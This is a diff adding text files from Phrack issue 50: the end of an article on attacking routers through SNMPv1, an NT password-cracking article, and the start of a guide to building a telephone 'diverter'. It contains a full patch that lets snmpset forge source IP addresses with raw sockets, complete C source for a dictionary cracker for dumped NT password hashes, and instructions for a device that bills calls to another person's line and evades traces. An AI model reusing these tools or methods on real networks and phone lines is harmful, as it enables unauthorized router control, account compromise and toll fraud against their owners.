+if any, ever check for them.  (as it turns out, the above router had a 
+community name of 'cisco00'.  Imaginative, eh?)  
+
+Even if only public works, there's lots of interesting things available via
+SNMP.  We can dump routing tables, connection tables, statistics on router use.
+In certain situations, we can even get information on packet filters in place,
+and access control rules. All are useful information to have in setting up 
+attacks in conventional manners.   Sometimes public is even given r/w on
+certain tables, and we can do most of what we need to do via that account.
+When we do have a priveledged community though, the fun begins.
+
+
+Remote Manipulation via SNMP
+
+We have all the elements we need to remotely configure the network.  We have
+a community name, we have the ability to forge the manager (the SNMP client)
+address.  All we need to figure out is what we can modify.  This really 
+varies.  There are a set of defaults that almost every SNMP'able machine
+will have.  In addition to these, though, are the 'enterprise' MIB's, which
+define vendor specific SNMP tables and fields.  There's really too much to go
+into here.  Check out ftp://ftp.cisco.com/ or ftp://ftp.ascend.com/ , for
+example...most vendors make their MIB's easy to find.  Cisco's web page also
+has a great introduction to their enterprise MIB's, which detail all the
+differences between different IOS release levels and whatnot.
+IN the meantime, though, check out the following as fun places to begin:
+
+system.sysContact   \
+system.sysName       |- really sorta pointless to change, but hey...whatever.
+system.sysLocation  /
+
+interfaces.ifTable.ifAdminStatus.n (where n is a number, starting at 0)
+
+at.atTable.atIfIndex.n
+at.atTable.atPhysAddress.n
+at.atTable.atNetAddress.n
+
+ip.ipForwarding
+ip.ipDefaultTTL
+ip.ipRouteTable.* (there's tons of stuff in this table)
+ip.ipNetToMediaTable.* (same as above)
+
+tcp.tcpConnState.* (only setable to 12, which deletes the TCB)
+
+and so on.  If you have a copy of TCP/IP Illustrated Vol. 1, the SNMP chapter
+will give you a set of tables with the types of all these values.  If you don't
+have TCP/IP Illustrated, get off your computer and go buy it.
+
+Remember, people don't really like it too much when you muck with their 
+equipment.  Act responsibly.  
+
+And to the admins reading this: TURN OFF SNMPv1!  Think about it.  Any time
+you allow control of you network via the network in a manner as unsafe as
+how SNMPv1 does it, you're creating more problems for yourself.  Realizing
+its all about acceptable risks, realize this isn't one.  Go investigate 
+alternate network management software.  Realize, however, there are always
+going to be problems.  (I don't recommend SNMPv2, however...a few months from
+now when I release my SNMPv2 article and tools, you'll be glad you are not
+running it)
+
+Resources:
+The software I use is based on the UCD modifications to the CMU SNMP 
+distribution.  It is available at:
+
+ftp://ftp.ece.ucdavis.edu/pub/snmp/ucd-snmp-3.1.3.tar.gz
+
+Following this article there is a patch, which are the modifications to
+the snmplib to support address spoofing, and modifications to the 'snmpset'
+app to support them.  The patch is only known to work under Solaris, though
+it should take only minor changes to move it to any other platform.
+
+ftp.cisco.com/pub/mibs and ftp.ascend.com/pub/Software-Releases/SNMP/MIBS
+contain the enterprise MIBS for a variety of different pieces of hardware.
+www.cisco.com/univercd/ contains tons of info on a variety of different 
+Cisco hardware and software, including great references on SNMP under IOS.
+
+http://www.cs.tu-bs.de/ibr/cgi-bin/sbrowser.cgi
+
+has a MIB browser, which allows you to use your favorite web client to
+peruse the standard as well as vendor MIBs  on thier site.
+
+RFC's!  Yes!  All of them.  Go to http://www.internic.net/ds/dspg0intdoc.html
+and read them.  Do a search for SNMP and you'll get back tons of hits.  
+They're a little...hrm...terse at times, but these are the defacto definitions
+of SNMP.  Skimming them will give you more info than you can imagine.
+
+
+<++> SNMPv1/snmp.diff
+*** apps/snmpset.c      Mon Jan 20 09:07:22 1997
+-- apps/snmpset.c       Tue Apr  8 17:21:03 1997
+***************
+*** 77,83 ****
+  
+  void
+  usage(){
+!     fprintf(stderr, "Usage: snmpset -v 1 [-q] hostname community [objectID typ
+e value]+    or:\n");
+      fprintf(stderr, "Usage: snmpset [-v 2] [-q] hostname noAuth [objectID type
+ value]+     or:\n");
+      fprintf(stderr, "Usage: snmpset [-v 2] [-q] hostname srcParty dstParty con
+text [oID type val]+\n");
+      fprintf(stderr, "\twhere type is one of: i, s, x, d, n, o, t, a\n");
+--- 77,83 ----
+  
+  void
+  usage(){
+!     fprintf(stderr, "Usage: snmpset -v 1 [-e fakeip] [-q] hostname community [
+objectID type value]+    or:\n");
+      fprintf(stderr, "Usage: snmpset [-v 2] [-q] hostname noAuth [objectID type
+ value]+     or:\n");
+      fprintf(stderr, "Usage: snmpset [-v 2] [-q] hostname srcParty dstParty con
+text [oID type val]+\n");
+      fprintf(stderr, "\twhere type is one of: i, s, x, d, n, o, t, a\n");
+***************
+*** 85,90 ****
+--- 85,93 ----
+      fprintf(stderr, "\t\tn: NULLOBJ, o: OBJID, t: TIMETICKS, a: IPADDRESS\n");
+  }
+  
++ extern char *fakeaddr;
++ extern int nastyflag;
++ 
+  int
+  main(argc, argv)
+      int           argc;
+***************
+*** 152,158 ****
+                          usage();
+                          exit(1);
+                      }
+!                     break;
+                default:
+                    printf("invalid option: -%c\n", argv[arg][1]);
+                    break;
+--- 155,165 ----
+                          usage();
+                          exit(1);
+                      }
+!                   break;
+!               case 'e':
+!                       fakeaddr = argv[++arg];
+!                       nastyflag = 1;
+!                       break;
+                default:
+                    printf("invalid option: -%c\n", argv[arg][1]);
+                    break;
+*** snmplib/snmp_api.c  Mon Jan 20 10:43:20 1997
+-- snmplib/snmp_api.c   Tue Apr  8 17:21:08 1997
+***************
+*** 58,63 ****
+--- 58,71 ----
+  #include <sys/select.h>
+  #endif
+  #include <sys/socket.h>
++ 
++ #include <netinet/in_systm.h>
++ #include <netinet/in.h>
++ #include <netinet/ip_var.h>
++ #include <netinet/ip.h>
++ #include <netinet/udp.h>
++ #include <netinet/udp_var.h>
++  
+  #include <netdb.h>
+  #include "asn1.h"
+  #include "snmp.h"
+***************
+*** 847,852 ****
+--- 855,882 ----
+      }
+      return 0;
+  }
++ /* EVIL STUFF in_cksum for forged ip header */
++ unsigned short in_cksum(addr, len)
++     u_short *addr;
++     int len;
++ {
++     register int nleft = len;
++     register u_short *w = addr;
++     register int sum = 0;
++     u_short answer = 0;
++     while (nleft > 1)  {
++         sum += *w++;
++         nleft -= 2;
++     }
++     if (nleft == 1) {
++         *(u_char *)(&answer) = *(u_char *)w ;
++         sum += answer;
++     }
++     sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
++     sum += (sum >> 16);         /* add carry */
++     answer = ~sum;              /* truncate to 16 bits */
++     return(answer);
++ }
+  
+  /*
+   * Sends the input pdu on the session after calling snmp_build to create
+***************
+*** 857,862 ****
+--- 887,894 ----
+   * On any error, 0 is returned.
+   * The pdu is freed by snmp_send() unless a failure occured.
+   */
++ char *fakeaddr = NULL;
++ int nastyflag = 0;
+  int
+  snmp_send(session, pdu)
+      struct snmp_session *session;
+***************
+*** 1013,1026 ****
+        xdump(packet, length, "");
+          printf("\n\n");
+      }
+  
+! 
+!     if (sendto(isp->sd, (char *)packet, length, 0,
+!              (struct sockaddr *)&pdu->address, sizeof(pdu->address)) < 0){
+!       perror("sendto");
+!       snmp_errno = SNMPERR_GENERR;
+!       return 0;
+!     }
+  /*    gettimeofday(&tv, (struct timezone *)0); */
+      tv = Now;
+      if (pdu->command == GET_REQ_MSG || pdu->command == GETNEXT_REQ_MSG
+--- 1045,1099 ----
+        xdump(packet, length, "");
+          printf("\n\n");
+      }
++    if(nastyflag == 1)
++       {
++         struct ip *ip_hdr;
++         struct udphdr *udp_hdr;
++         char *payload;
++         int socky;
++         struct sockaddr_in dest;
++         payload = (char*) malloc
++                 (sizeof(struct ip)
++                  + (sizeof(struct udphdr)) + length);
++         ip_hdr = (struct ip*) payload;
++         ip_hdr->ip_v=4;
++         ip_hdr->ip_hl=5;
++         ip_hdr->ip_tos=0;
++         ip_hdr->ip_off=0;
++         ip_hdr->ip_id=htons(1+rand()%1000);
++         ip_hdr->ip_ttl=255;
++         ip_hdr->ip_p=IPPROTO_UDP;
++         ip_hdr->ip_len = htons(sizeof(struct ip) + sizeof(struct udphdr) + len
+gth);
++         ip_hdr->ip_src.s_addr = inet_addr(fakeaddr);
++         ip_hdr->ip_dst = pdu->address.sin_addr;
++         ip_hdr->ip_sum = in_cksum(&ip_hdr,sizeof(ip_hdr));
++  
++         udp_hdr = (struct udphdr *) (payload + sizeof(struct ip));
++         udp_hdr->uh_sport = htons(10000+rand()%20000);
++         udp_hdr->uh_dport = htons(161);
++         udp_hdr->uh_ulen = htons(length + sizeof(struct udphdr));
++         udp_hdr->uh_sum = 0;
++         memcpy(payload + sizeof(struct udphdr)+sizeof(struct ip),packet,length
+);
++         dest.sin_family = AF_INET;
++         dest.sin_port = htons(161);
++         dest.sin_addr = pdu->address.sin_addr;
++         socky = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
++         fprintf(stderr,"Payload size:%d sent\n",sendto(socky,payload,28+length
+,0,
++                                      (struct sockaddr *)&dest,sizeof(dest)));
++       exit(0);
+  
+!       }
+!       else
+!       {
+!               if (sendto(isp->sd, (char *)packet, length, 0,
+!                  (struct sockaddr *)&pdu->address, 
+!                          sizeof(pdu->address)) < 0)
+!                 {
+!                       perror("sendto");
+!                       snmp_errno = SNMPERR_GENERR;
+!                       return 0;
+!                 }
+!          }
+  /*    gettimeofday(&tv, (struct timezone *)0); */
+      tv = Now;
+      if (pdu->command == GET_REQ_MSG || pdu->command == GETNEXT_REQ_MSG
+<--> SNMPv1/snmp.diff
diff --git a/phrack50/8.txt b/phrack50/8.txt
new file mode 100644
index 0000000..4314b04
--- /dev/null
+++ b/phrack50/8.txt
@@ -0,0 +1,548 @@
+                                .oO Phrack 50 Oo.
+
+                            Volume Seven, Issue Fifty
+
+                                     8 of 16
+
+Cracking NT Passwords
+by Nihil
+
+Recently a breakthrough was made by one of the Samba team members, Jeremy
+Allison, that allows an administrator to dump the one-way functions (OWF)
+of the passwords for each user from the Security Account Manager (SAM)
+database, which is similar to a shadowed password file in *nix terms.  The
+program Jeremy wrote is called PWDUMP, and the source can be obtained from
+the Samba team's FTP server.  This is very useful for administrators of
+Samba servers, for it allows them to easily replicate the user database
+from Windows NT machines on Samba servers.  It also helps system 
+administrators and crackers in another way: dictionary attacks against
+user's passwords.  There is more, but I will save that for later.
+
+Windows NT stores two hashes of a user's password in general: the LanMan
+compatible OWF and the NT compatible OWF.  The LanMan OWF is generated by
+limiting the user's password to 14 characters (padding with NULLs if it is
+shorter), converting all alpha characters to uppercase, breaking the 14
+characters (single byte OEM character set) into two 7 byte blocks,
+expanding each 7 byte block into an 8 byte DES key with parity, and
+encrypting a known string, {0xAA,0xD3,0xB4,0x35,0xB5,0x14,0x4,0xEE}, with
+each of the two keys and concatenating the results.  The NT OWF is created
+by taking up to 128 characters of the user's password, converting it to
+unicode (a two byte character set used heavily in NT), and taking the MD4
+hash of the string.  In practice the NT password is limited to 14
+characters by the GUI, though it can be set programmatically to something
+greater in length.
+
+The demonstration code presented in this article does dictionary attacks
+against the NT OWF in an attempt to recover the NT password, for this is
+what one needs to actually logon to the console.  It should be noted that
+it is much easier to brute force the LanMan password, but it is only used
+in network authentication.  If you have the skillz, cracking the LanMan
+password can take you a long way towards cracking the NT password more
+efficently, but that is left as an exercise for the reader ;>
+
+For those readers wit da network programming skillz, the hashes themselves
+are enough to comprimise a NT machine from the network.  This is so because
+the authentication protocol used in Windows NT relies on proof of the OWF
+of the password, not the password itself.  This is a whole other can of
+worms we won't get into here.
+
+The code itself is simple and pretty brain dead.  Some Samba source was
+used to speed up development time, and I would like to give thanks to the
+Samba team for all their effort.  Through the use of, and study of, Samba
+several interesting security weaknesses in Windows NT have been uncovered.
+This was not the intent of the Samba team, and really should be viewed as
+what it is - some lame security implementations on Microsoft's part.  Hey,
+what do you expect from the people that brought you full featured (not in a
+good way, mind you) macro languages in productivity applications?
+
+You will need md4.c, md4.h, and byteorder.h from the Samba source
+distribution inorder to compile the code here.  It has been compiled and
+tested using Visual C++ 4.2 on Windows NT 4.0, but I see no reason why it
+should not compile and run on your favorite *nix platform.  To truly be
+useful, some code should be added to try permutations of the dictionary
+entry and user name, but again, that is up to the reader.
+
+One note: You will want to remove 3 lines from md4.c: the #ifdef SMB_PASSWD 
+at the top and corresponding #else and #endif at the bottom...
+
+Here ya go:
+
+<++> NTPWC/ntpwc.c
+/*
+ * (C) Nihil 1997. All rights reserved. A Guild Production.
+ * 
+ * This program is free for commercial and non-commercial use.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted.
+ *
+ * THIS SOFTWARE IS PROVIDED BY NIHIL ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+/* Samba is covered by the GNU GENERAL PUBLIC LICENSE Version 2, June 1991 */
+
+
+/* dictionary based NT password cracker. This is a temporary 
+ * solution until I get some time to do something more 
+ * intelligent. The input to this program is the output of 
+ * Jeremy Allison's PWDUMP.EXE which reads the NT and LANMAN 
+ * OWF passwords out of the NT registry and a crack style 
+ * dictionary file. The output of PWDUMP looks 
+ * a bit like UNIX passwd files with colon delimited fields.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <ctype.h>
+
+/* Samba headers we use */
+#include "byteorder.h"
+#include "md4.h"
+
+#define TRUE  1
+#define FALSE 0
+#define HASHSIZE 16
+
+/* though the NT password can be up to 128 characters in theory,
+ * the GUI limits the password to 14 characters.  The only way
+ * to set it beyond that is programmatically, and then it won't
+ * work at the console! So, I am limiting it to the first 14
+ * characters, but you can change it to up to 128 by modifying
+ * MAX_PASSWORD_LENGTH
+ */
+#define MAX_PASSWORD_LENGTH 14
+
+/* defines for Samba code */
+#define uchar unsigned char
+#define int16 unsigned short
+#define uint16 unsigned short
+#define uint32 unsigned int
+
+/* the user's info we are trying to crack */
+typedef struct _USER_INFO
+{
+	char*			username;
+	unsigned long	ntpassword[4];
+
+}USER_INFO, *PUSER_INFO;
+
+/* our counted unicode string */
+typedef struct _UNICODE_STRING
+{
+	int16*			buffer;
+	unsigned long	length;
+
+}UNICODE_STRING, *PUNICODE_STRING;
+
+/* from Samba source cut & pasted here */
+static int _my_mbstowcs(int16*, uchar*, int);
+static int _my_wcslen(int16*);
+
+/* forward declarations */
+void Cleanup(void);
+int ParsePWEntry(char*, PUSER_INFO);
+
+/* global variable definition, only reason is so we can register an
+ * atexit() fuction to zero these for paranoid reasons
+ */
+char pPWEntry[258];		
+char pDictEntry[129];   /* a 128 char password? yeah, in my wet dreams */
+MDstruct MDContext;		/* MD4 context structure */
+
+
+int main(int argc,char *argv[])
+{
+	FILE *hToCrack, *hDictionary;
+	PUSER_INFO pUserInfo;
+	PUNICODE_STRING pUnicodeDictEntry;
+	int i;
+	unsigned int uiLength;
+
+	/* register exit cleanup function */
+	atexit(Cleanup);
+
+	/* must have both arguments */
+	if (argc != 3) 
+	{
+		printf("\nUsage: %s <password file> <dictionary file>\n", argv[0]);
+		exit(0);
+	}
+
+	/* open password file */
+	hToCrack = fopen(argv[1], "r");
+	if (hToCrack == NULL)
+	{
+		fprintf(stderr,"Unable to open password file\n");
+		exit(-1);
+	}
+	
+	/* open dictionary file */
+	hDictionary = fopen(argv[2], "r");
+	if (hDictionary == NULL)
+	{
+		fprintf(stderr,"Unable to open dictionary file\n");
+		exit(-1);
+	}
+
+	/* allocate space for our user info structure */
+	pUserInfo = (PUSER_INFO)malloc(sizeof (USER_INFO));
+	if (pUserInfo == NULL)
+	{
+		fprintf(stderr,"Unable to allocate memory for user info structure\n");
+		exit(-1);
+	}
+
+	/* allocate space for unicode version of the dictionary string */
+	pUnicodeDictEntry = (PUNICODE_STRING)malloc(sizeof (UNICODE_STRING));
+	if (pUnicodeDictEntry == NULL)
+	{
+		fprintf(stderr,"Unable to allocate memory for unicode conversion\n");
+		free(pUserInfo);
+		exit(-1);
+	}
+
+	/* output a banner so the user knows we are running */
+	printf("\nCrack4NT is running...\n");
+	
+	/* as long as there are entries in the password file read
+	 * them in and crack away */
+	while (fgets(pPWEntry, sizeof (pPWEntry), hToCrack))
+	{
+		/* parse out the fields and fill our user structure */
+		if (ParsePWEntry(pPWEntry, pUserInfo) == FALSE)
+		{
+			continue;
+		}
+
+		/* reset file pointer to the beginning of the dictionary file */
+		if (fseek(hDictionary, 0, SEEK_SET))
+		{
+			fprintf(stderr,"Unable to reset file pointer in dictionary\n");
+			memset(pUserInfo->ntpassword, 0, HASHSIZE);
+			free(pUserInfo);
+			free(pUnicodeDictEntry);
+			exit(-1);
+		}
+		
+		/* do while we have new dictionary entries */
+		while (fgets(pDictEntry, sizeof (pDictEntry), hDictionary))
+		{
+			/* doh...fgets is grabbing the fucking newline, how stupid */
+			if (pDictEntry[(strlen(pDictEntry) - 1)] == '\n')
+			{
+				pDictEntry[(strlen(pDictEntry) - 1)] = '\0';
+			}
+
+			/* the following code is basically Jeremy Allison's code written
+			 * for the Samba project to generate the NT OWF password.  For
+			 * those of you who have accused Samba of being a hacker's
+			 * paradise, get a fucking clue.  There are parts of NT security
+			 * that are so lame that just seeing them implemented in code
+			 * is enough to break right through them.  That is all that
+			 * Samba has done for the hacking community.
+			 */
+
+			/* Password cannot be longer than MAX_PASSWORD_LENGTH characters */
+			uiLength = strlen((char *)pDictEntry);
+			if(uiLength > MAX_PASSWORD_LENGTH)
+				uiLength = MAX_PASSWORD_LENGTH;
+
+			/* allocate space for unicode conversion */
+			pUnicodeDictEntry->length = (uiLength + 1) * sizeof(int16);
+	
+			/* allocate space for it */
+			pUnicodeDictEntry->buffer = (int16*)malloc(pUnicodeDictEntry->length);
+			if (pUnicodeDictEntry->buffer == NULL)
+			{
+				fprintf(stderr,"Unable to allocate space for unicode string\n");
+				exit(-1);
+			}
+			
+			/* Password must be converted to NT unicode */
+			_my_mbstowcs( pUnicodeDictEntry->buffer, pDictEntry, uiLength);
+			/* Ensure string is null terminated */
+			pUnicodeDictEntry->buffer[uiLength] = 0; 
+			
+			/* Calculate length in bytes */
+			uiLength = _my_wcslen(pUnicodeDictEntry->buffer) * sizeof(int16);
+ 
+			MDbegin(&MDContext);
+			for(i = 0; i + 64 <= (signed)uiLength; i += 64)
+				MDupdate(&MDContext,pUnicodeDictEntry->buffer + (i/2), 512);
+			MDupdate(&MDContext,pUnicodeDictEntry->buffer + (i/2),(uiLength-i)*8);
+
+			/* end of Samba code */
+
+			/* check if dictionary entry hashed to the same value as the user's
+			 * NT password, if so print out user name and the corresponding
+			 * password
+			 */
+			if (memcmp(MDContext.buffer, pUserInfo->ntpassword, HASHSIZE) == 0)
+			{
+				printf("Password for user %s is %s\n", pUserInfo->username, \
+					   pDictEntry);
+				/* we are done with the password entry so free it */
+				free(pUnicodeDictEntry->buffer);
+				break;
+			}
+
+			/* we are done with the password entry so free it */
+			free(pUnicodeDictEntry->buffer);
+		}
+	}
+
+	/* cleanup a bunch */
+	free(pUserInfo->username);
+	memset(pUserInfo->ntpassword, 0, HASHSIZE);
+	free(pUserInfo);
+	free(pUnicodeDictEntry);
+
+	/* everything is great */
+	printf("Crack4NT is finished\n");
+	return 0;
+}
+
+void Cleanup()
+{
+	memset(pPWEntry, 0, 258);
+	memset(pDictEntry, 0, 129);
+	memset(&MDContext.buffer, 0, HASHSIZE);
+}
+
+
+/* parse out user name and OWF */
+int ParsePWEntry(char* pPWEntry, PUSER_INFO pUserInfo)
+{
+	int HexToBin(char*, uchar*, int);
+	
+	char pDelimiter[] = ":";
+	char* pTemp;
+	char pNoPW[] = "NO PASSWORD*********************";
+	char pDisabled[] = "********************************";
+
+	/* check args */
+	if (pPWEntry == NULL || pUserInfo == NULL)
+	{
+		return FALSE;
+	}
+	
+	/* try and get user name */
+	pTemp = strtok(pPWEntry, pDelimiter);
+	if (pTemp == NULL)
+	{
+		return FALSE;
+	}
+
+	/* allocate space for user name in USER_INFO struct */
+	pUserInfo->username = (char*)malloc(strlen(pTemp) + 1);
+	if (pUserInfo->username == NULL)
+	{
+		fprintf(stderr,"Unable to allocate memory for user name\n");
+		return FALSE;
+	}
+
+	/* get the user name into the USER_INFO struct */
+	strcpy(pUserInfo->username, pTemp);
+
+	/* push through RID and LanMan password entries to get to NT password */
+	strtok(NULL, pDelimiter);
+	strtok(NULL, pDelimiter);
+
+	/* get NT OWF password */
+	pTemp = strtok(NULL, pDelimiter);
+	if (pTemp == NULL)
+	{
+		free(pUserInfo->username);
+		return FALSE;
+	}
+
+	/* do a sanity check on the hash value */
+	if (strlen(pTemp) != 32)
+	{
+		free(pUserInfo->username);
+		return FALSE;
+	}
+
+	/* check if the user has no password - we return FALSE in this case to avoid
+	 * unnecessary crack attempts
+	 */
+	if (strcmp(pTemp, pNoPW) == 0)
+	{
+		printf("User %s has no password\n", pUserInfo->username);
+		return FALSE;
+	}
+
+	/* check if account appears to be disabled - again we return FALSE */
+	if (strcmp(pTemp, pDisabled) == 0)
+	{
+		printf("User %s is disabled most likely\n", pUserInfo->username);
+		return FALSE;
+	}
+
+	/* convert hex to bin */
+	if (HexToBin((unsigned char*)pTemp, (uchar*)pUserInfo->ntpassword,16) == FALSE)
+	{
+		free(pUserInfo->username);
+		return FALSE;
+	}
+
+	/* cleanup */
+	memset(pTemp, 0, 32);
+
+	return TRUE;
+}
+
+
+/* just what it says, I am getting tired
+ * This is a pretty lame way to do this, but it is more efficent than
+ * sscanf()
+ */
+int HexToBin(char* pHexString, uchar* pByteString, int count)
+{
+	 int i, j;
+
+	 if (pHexString == NULL || pByteString == NULL)
+	 {
+		fprintf(stderr,"A NULL pointer was passed to HexToBin()\n");
+		return FALSE;
+	 }
+	 
+	 /* clear the byte string */
+	 memset(pByteString, 0, count);
+	 
+	 /* for each hex char xor the byte with right value, we are targeting
+	  * the low nibble
+	  */
+	 for (i = 0, j = 0; i < (count * 2); i++)
+	 {
+		 switch (*(pHexString + i))
+		 {
+			case '0': pByteString[j] ^= 0x00;
+				break;
+
+			case '1': pByteString[j] ^= 0x01;
+				break;
+
+			case '2': pByteString[j] ^= 0x02;
+				break;
+
+			case '3': pByteString[j] ^= 0x03;
+				break;
+
+			case '4': pByteString[j] ^= 0x04;
+				break;
+
+			case '5': pByteString[j] ^= 0x05;
+				break;
+
+			case '6': pByteString[j] ^= 0x06;
+				break;
+
+			case '7': pByteString[j] ^= 0x07;
+				break;
+
+			case '8': pByteString[j] ^= 0x08;
+				break;
+
+			case '9': pByteString[j] ^= 0x09;
+				break;
+
+			case 'a':
+			case 'A': pByteString[j] ^= 0x0A;
+				break;
+
+			case 'b':
+			case 'B': pByteString[j] ^= 0x0B;
+				break;
+
+			case 'c':
+			case 'C': pByteString[j] ^= 0x0C;
+				break;
+
+			case 'd':
+			case 'D': pByteString[j] ^= 0x0D;
+				break;
+
+			case 'e':
+			case 'E': pByteString[j] ^= 0x0E;
+				break;
+
+			case 'f':
+			case 'F': pByteString[j] ^= 0x0F;
+				break;
+
+			default: fprintf(stderr,"invalid character in NT MD4 string\n");
+				     return FALSE;
+		 }
+
+		 /* I think I need to explain this ;) We want to incremet j for every
+		  * two characters from the hex string and we also want to shift the 
+		  * low 4 bits up to the high 4 just as often, but we want to alternate
+		  * The logic here is to xor the mask to set the low 4 bits, then shift
+		  * those bits up and xor the next mask to set the bottom 4. Every 2
+		  * hex chars for every one byte, get my screwy logic? I never was
+		  * good at bit twiddling, and sscanf sucks for efficiency :(
+		  */
+		 if (i%2)
+		 {
+			j ++;
+		 }
+		 if ((i%2) == 0)
+		 {
+			pByteString[j] <<= 4;
+		 }
+	 }
+
+	 return TRUE;
+}
+
+
+/* the following functions are from the Samba source, and many thanks to the 
+ * authors for their great work and contribution to the public source tree
+ */
+
+/* Routines for Windows NT MD4 Hash functions. */
+static int _my_wcslen(int16 *str)
+{
+	int len = 0;
+	while(*str++ != 0)
+		len++;
+	return len;
+}
+
+/*
+ * Convert a string into an NT UNICODE string.
+ * Note that regardless of processor type 
+ * this must be in intel (little-endian)
+ * format.
+ */
+ static int _my_mbstowcs(int16 *dst, uchar *src, int len)
+{
+	int i;
+	int16 val;
+ 
+	for(i = 0; i < len; i++) {
+		val = *src;
+		SSVAL(dst,0,val);
+		dst++;
+		src++;
+		if(val == 0)
+			break;
+	}
+	return i;
+}
+<--> NTPWC/ntpwc.c
+
+EOF
diff --git a/phrack50/9.txt b/phrack50/9.txt
new file mode 100644
index 0000000..d6b386a
--- /dev/null
+++ b/phrack50/9.txt
@@ -0,0 +1,457 @@
+                                .oO Phrack 50 Oo.
+
+                            Volume Seven, Issue Fifty
+
+                                     9 of 16
+ 
+                                SS7 based diverter
+
+                      The MasterMiiND <miind@geocities.com>
+
+
+Brief Description:
+------------------
+
+Hey everyone, well I've spent some time now designing a Diverter, and finally 
+came up with a foolproof design.  After building every diverter plan I could
+find, and finding that they didn't work under the switching systems of our
+day (not surprising, seeing how all the plans are like ten years old) I 
+decided something needed to be done.  Well, I thought I'd share this new 
+diverter with everyone, so we can all have phun again, until they change the 
+system again.
+
+Also called a "Gold Box", a diverter allows somebody to call one predetermined
+telephone number, and then get a dial tone from another predetermined phone
+line.  It is like calling a direct in-dial (DID) line on a PBX and getting a
+dial tone.  The main difference is, that YOU actually built the device, and
+you don't have to enter authorization codes to get the dial tone.
+
+Uses:
+-----
+
+You can setup a diverter so that you can call pseudo-anonymously.  That is,
+you call the diverter, and then call out of the second line.  That way, if
+anybody checks their caller ID unit, the number of the second line, and not
+your own line will show up.  Also, if they decide to activate a trace, then
+the telco and the police will get the wrong number.
+
+Another reason for setting up a diverter of course, is to avoid paying for
+telephone calls.  Any, and all calls you make on a diverter, are billed to
+the owner of the second line.  This means, that if you call your Aunt Jemima
+in the Outer Hebrides for 10 minutes, then the owner of the line you used will
+get her number, and be able to call her up and ask who called her at the time
+and date stated on their bill.  Now, if she is your average Aunt Jemima, then 
+she will most likely say, 'Oh, that was my nephew, Michael.  His number is
+555-2357'.  But if she is cool, like MY Aunt Jemima, she would say something
+like 'Hmm, let me see...oh yes, that was a telemarketer from the USA, trying
+to sell me a used vacuum cleaner.'  Anyway, my point is, that every billable
+call you make, will show up on their bill.  For that reason, it is best suited
+to call stuff that you don't care too much about.  Setting up teleconferences,
+calling long distance BBS's, phone sex, and maybe even long distance scanning
+are all good uses for the diverter.
+
+Technical Description:
+----------------------
+
+Ok, so you want to make a diverter?  Well, before you set out designing a
+diverter, there are some basic properties of the Signaling System 7 (SS7)
+telephone system that you should be aware of.  Previous plans for diverters
+have been release in the past, but as those of you who tried to make one have
+realized, they do not work under SS7.  Generally, these plans are around ten
+years old, and were designed for older switching systems such as Step by Step
+(SxS) and CrossBar (xbar).  The diverter that I have come up with, has been
+tested under GTD-5 EAX, and DMS-100 switches.  Because the signaling used by
+these switches, and the #5ESS are the same, it is safe to assume the diverter
+would work under #5ESS, although I can't say for sure, as I haven't been able
+to test it out.  If someone gets one working under an AT&T switch, please
+drop me a line, because I would be really interested in how it worked, and
+what, if any, changes had to be made.  Ok, enough nonsense from me!
+
+When your telephone is in it's normal on-hook state, there is approximately
+48VDC across the ring and tip.  When you pick up your phone, the voltage
+drops down to about 6-10VDC.  This is because taking your phone off-hook
+causes a closed circuit across the ring and tip, through your telephone.
+Doing so, causes the CO's equipment to sense you have taken your telephone
+off-hook, and send you a dial tone to tell you it is ready to receive dialing
+instructions.  Ok, now, suppose your phone is on-hook.  Your Aunt Jemima calls
+you up.  How does the CO alert you to this?  Well, they send a ring signal to
+your line.  This is a 90-130VAC signal, that is approximately 20Hz in
+frequency.  This is pulsed on for 2 seconds, then off for 4 seconds.  This is
+then repeated for a predetermined amount of time, or until you pick up your
+phone.  The amount of time a phone will ring, if you don't pick up your phone
+depends on how your phriends at the CO programmed the switch.  The reason why
+it has a time limit for a ring out, is for two main reasons.  First of all,
+it takes a lot of equipment resources and power in the CO to ring a phone.
+And secondly, to put an end to phreaker's "Black Boxes" that would depend on
+the switches ability to ring a phone for ever, if it wasn't picked up...
+
+Ok, now you pick up your ringing phone.  This causes voltage to flow from the
+tip through your phone to the ring.  This causes the CO's switching equipment
+to stop sending the ringing signal, and then drops the voltage down to around
+6-10VDC.  An audio path is then opened between your Aunt Jemima and you.  Now, 
+after about 10 minutes of speaking with her, your Aunt Jemima shouts: 
+'Oh no...my pancakes are burning...gota go...' and hangs up on you.  But you,
+being the phreak that you are, stay on the line.  You listen carefully, but
+hear nothing but the silence of linenoise.  Then, after about 10 seconds,
+the CO sends a disconnect signal to your line.  This disconnect signal is
+simply a reversal of polarity between the ring and tip for about 1 second.
+When the polarity is first reversed, you hear a click in the earpiece of the
+phone.  Then, when the polarity is reversed again, you hear another click.
+The voltage is back at 6-10VDC, and the polarity is just as if you had just
+picked up your phone.  Now, if you stay on the line for about 30 seconds
+longer, the CO will send an off-hook signal, which is a very special signal.
+It is a MF signal that consists of 1400Hz & 2060Hz & 2450Hz & 2600Hz tone
+pulsed on 0.1 second on, and 0.1 second off.  That is the very loud and
+annoying sound you hear if you leave your phone off-hook.
+
+Ok, those are the basic properties of the SS7 telephone system you need to
+know, to understand how the diverter works.  I've spent a little of my time
+drawing a schematic in GIF format, and you will find it uuencoded at the end
